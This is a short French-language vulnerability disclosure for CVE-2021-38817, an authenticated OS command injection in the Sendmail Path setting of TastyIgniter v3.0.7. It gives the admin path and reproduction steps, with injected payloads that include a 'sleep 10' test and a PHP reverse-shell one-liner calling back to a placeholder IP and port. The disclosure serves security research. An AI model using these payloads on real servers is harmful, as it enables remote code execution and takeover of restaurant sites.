
Injection de commandes OS à distance dans le champ Sendmail Path de TastyIgniter v3.0.7
Injection de commandes OS à distance authentifiée / Exécution de code à distance dans la partie web Sendmail de TastyIgniter v3.0.7 (CVE-2021-38817)
Une vulnérabilité d'injection de commandes OS à distance authentifiée existe dans le menu de configuration Sendmail de l'application web du CMS Restaurtant TastyIgniter v3.0.7. Le paramètre Sendmail Path n'est pas correctement assaini, comme l'indique la commande /usr/sbin/sendmail -bs préremplie dans le champ, et permet d'injecter une commande arbitraire en ajoutant un point-virgule et une commande OS supplémentaire.
/admin/settings/edit/mail/admin/settings/edit/mailMail Protocol, sélectionner SendmailSendMail Path, ajouter un point-virgule et une commande OS arbitraire, c.-à-d. /usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
Matt Kiely (HuskyHacks) et Mike Padrick (Fearless), août 2021
CVE attribué en octobre 2022 (mdr)